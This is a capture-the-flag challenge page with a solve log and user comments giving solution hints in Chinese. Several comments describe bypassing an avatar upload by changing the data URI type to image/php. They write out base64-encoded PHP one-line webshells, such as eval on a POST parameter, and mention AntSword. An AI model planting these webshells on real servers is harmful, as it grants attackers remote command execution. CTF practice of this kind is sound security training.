评分(12)
解题动态
psx900910 攻破了该题 8小时前
Kakivare 攻破了该题 2天前
iElloc 攻破了该题 2天前
suxiansheng 攻破了该题 3天前
yang0000 攻破了该题 5天前
掘金 攻破了该题 8天前
0n1y 攻破了该题 10天前
Tomato薯条 攻破了该题 12天前
admincon 攻破了该题 14天前
yinlin 攻破了该题 14天前
thexx 攻破了该题 14天前
wbq012 攻破了该题 16天前
凡尘桔子 攻破了该题 16天前
cxller 攻破了该题 17天前
微笑刺客 攻破了该题 17天前
粉红色的-毛 攻破了该题 17天前
sqw 攻破了该题 18天前
fish12138 攻破了该题 22天前
ndzdb 攻破了该题 22天前
评论
微笑刺客 17天前
举报
上传一张正常图片,提交时候BP截包,内容改为data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbImNtZCJdKTs/Pg==(base64后得结果),工具直连,拿flag
言寺介 4月前
举报
先上传正常图片,不然一直转圈圈,然后抓包修改图片data%3Aimage%2Fphp%3Bbase64%2C后面接一句话木马base64加密,然后蚁剑
ixin 5月前
举报
image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d
zhuizhui 10月前
举报
在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
llc123 1年前
举报
thinkphp v5.1.35 lts和xss不知道有没有操作空间
LoadOverload 1年前
举报
用webacoo亦可解决
Zhumeng 1年前
举报
注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php
zhuohao 1年前
举报
蚁剑一直返回数据为空 一直连不上
hackhui 1年前
举报
一句话木马传参加''
LLTVLL 1年前
举报
一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题
BlueL1ght 2年前
举报
<?php echo `$_POST[a]`;?>